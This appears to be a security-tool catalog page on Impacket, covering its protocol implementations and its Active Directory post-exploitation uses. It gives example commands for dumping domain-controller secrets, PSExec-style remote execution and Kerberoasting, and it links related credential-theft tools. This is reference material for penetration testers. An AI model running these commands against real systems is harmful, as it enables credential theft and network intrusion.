provocativo_
back to the arsenal
// arsenal·Post-ExploitAdvancedFOSS

Impacket

SecureAuth (now Fortra) Python toolkit for low-level Windows network protocols.

Post-Exploit

$ impacket --help

Impacket

// what it is

Description

Pure-Python implementations of SMB, MSRPC, NetBIOS, Kerberos, and DCE/RPC. Powers most modern AD post-exploitation: `psexec.py`, `secretsdump.py`, `GetUserSPNs.py`, `getTGT.py`, `wmiexec.py`, `ntlmrelayx.py`.

// use cases

What people use it for

  • Remote command execution (PSExec-style)
  • Dumping NTDS.dit from a DC
  • NTLM relay attacks
  • Kerberoasting from Linux

// commands

The commands you'll type

Secretsdump (DC)

$ secretsdump.py corp/admin@dc.corp.local

PSExec

$ psexec.py corp/admin@10.0.0.5

Kerberoast

$ GetUserSPNs.py corp.local/user -dc-ip 10.0.0.1 -request

// facts

category
Post-Exploit
platforms
LIN · WIN · MAC
license
FOSS
difficulty
Advanced

// links

// related in Post-Exploit

Post-ExploitAdvanced

Mimikatz

Benjamin Delpy's Windows credential-theft Swiss Army knife.

FOSS
WIN
open entry →
Post-ExploitAdvanced

BloodHound

Active Directory attack-path visualizer — graphs the shortest path to Domain Admin.

FOSS
LIN·WIN·MAC
open entry →
Post-ExploitAdvanced

CrackMapExec/CME/

Swiss-army knife for AD post-exploitation — sprays credentials over SMB/WinRM/MSSQL/LDAP.

FOSS
LIN·WIN·MAC
open entry →